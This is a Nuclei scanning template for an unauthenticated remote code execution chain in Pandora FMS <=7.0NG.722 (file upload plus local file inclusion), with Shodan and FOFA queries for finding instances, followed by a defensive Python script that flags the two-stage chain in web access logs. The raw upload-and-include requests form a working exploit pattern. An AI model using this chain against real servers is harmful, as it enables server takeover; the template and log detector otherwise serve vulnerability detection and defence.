Pandora FMS versions <=7.0NG.722 are vulnerable to unauthenticated remote code execution by chaining an unrestricted file upload (CVE-2018-11221) and a local file inclusion (CVE-2018-11222). An attacker can upload a malicious PHP file as a plugin and execute it via LFI, leading to full compromise of the server.
PoC code [published]
id: CVE-2018-11222

info:
  name: Pandora FMS <=7.0NG.722 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Pandora FMS versions <=7.0NG.722 are vulnerable to unauthenticated remote code execution by chaining an unrestricted file upload (CVE-2018-11221) and a local file inclusion (CVE-2018-11222). An attacker can upload a malicious PHP file as a plugin and execute it via LFI, leading to full compromise of the server.
  impact: |
    Unauthenticated attackers can upload malicious PHP files and execute them via local file inclusion, leading to complete server compromise and access to all managed systems.
  remediation: |
    Upgrade to Pandora FMS version 7.0NG.723 or later.
  reference:
    - https://blog.hackercat.ninja/post/pandoras_box/
    - https://github.com/pandorafms/pandorafms
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11222
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-11222
    cwe-id: CWE-20
    epss-score: 0.03828
    epss-percentile: 0.87828
    cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: artica
    product: pandora_fms
    shodan-query:
      - http.html:"pandora fms - installation wizard"
      - http.title:"pandora fms"
    fofa-query:
      - body="pandora fms - installation wizard"
      - title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2018,rce,file-upload,lfi,pandora,intrusive,vkev,vuln

variables:
  marker: "{{randstr}}"
  b64marker: "{{base64(marker)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------Sh5BXowDBYvdaiPqkMSZas
        Connection: keep-alive

        --------------------------Sh5BXowDBYvdaiPqkMSZas
        Content-Disposition: form-data; name="name"

        upfile
        --------------------------Sh5BXowDBYvdaiPqkMSZas
        Content-Disposition: form-data; name="filename"

        plugin.oum
        --------------------------Sh5BXowDBYvdaiPqkMSZas
        Content-Disposition: form-data; name="upfile"; filename="plugin.oum"
        Content-Type: application/octet-stream

        {{zip('plugin/phpinfo.php','<?php echo base64_decode(\'{{b64marker}}\'); ?>')}}
        --------------------------Sh5BXowDBYvdaiPqkMSZas--

    matchers:
      - type: word
        part: body
        words:
          - '"status":"success"'
          - '"package":"'
        condition: and

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"package":"(.*?)"'
        internal: true

  - raw:
      - |
        GET /pandora_console/ajax.php?page={{replace(path,"\\","")}}/plugin/phpinfo HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '{{marker}}'
# digest: 4a0a0047304502206bb70b7d26d081d7511f82b663bdf1a056f543295df54a139bdda32589a8c7d3022100c4ff38db045d8f24276fc0571ecd661cee95b834926c209c5b47566afb6c110a:922c64590222798bb761d5b6d8e72950
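The same two-stage chain seen from the defender's side: an added example (not part of the template above, nor Pandora FMS code) that scans Apache/nginx combined-format access-log lines for the update-package upload request and a follow-up `ajax.php` include whose `page` parameter is an absolute path or contains traversal, then correlates both stages per client IP. The log lines are constructed for the example, and the include path in the third one is illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format fields we need: client IP, method and request URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" \d{3}'
)
UPLOAD_PAGE = "include/ajax/update_manager.ajax"

def classify(line):
    """Return (ip, tag) for one log line; tag is 'upload', 'lfi' or None."""
    m = LOG_RE.match(line)
    if not m:
        return None, None
    parts = urlsplit(m["url"])
    if not parts.path.endswith("/pandora_console/ajax.php"):
        return m["ip"], None
    q = parse_qs(parts.query)
    page = q.get("page", [""])[0]
    # Stage 1: the update-manager upload handler the template posts the package to.
    if m["method"] == "POST" and page == UPLOAD_PAGE and q.get("upload_file") == ["true"]:
        return m["ip"], "upload"
    # Stage 2: ajax.php expects a relative include name; an absolute path or a
    # '..' segment in 'page' means the include target was chosen by the client.
    if page.startswith("/") or ".." in page.split("/"):
        return m["ip"], "lfi"
    return m["ip"], None

def find_chains(lines):
    """Return IPs that uploaded first and then requested a client-chosen include."""
    uploaded, chained = set(), []
    for line in lines:
        ip, tag = classify(line)
        if tag == "upload":
            uploaded.add(ip)
        elif tag == "lfi" and ip in uploaded and ip not in chained:
            chained.append(ip)
    return chained

# Constructed sample log lines (not real traffic); the package path is illustrative.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2018:12:00:01 +0000] "POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.1" 200 95',
    '198.51.100.7 - - [10/Jun/2018:12:00:02 +0000] "GET /pandora_console/ajax.php?page=include/ajax/events HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jun/2018:12:00:03 +0000] "GET /pandora_console/ajax.php?page=/var/www/html/pandora_console/attachment/downloads/EXAMPLE/plugin/phpinfo HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
    print("chained:", find_chains(SAMPLE_LOG))
```

A single `lfi` hit without a preceding upload from the same IP is still worth an alert; `find_chains` only reports the high-confidence pairing.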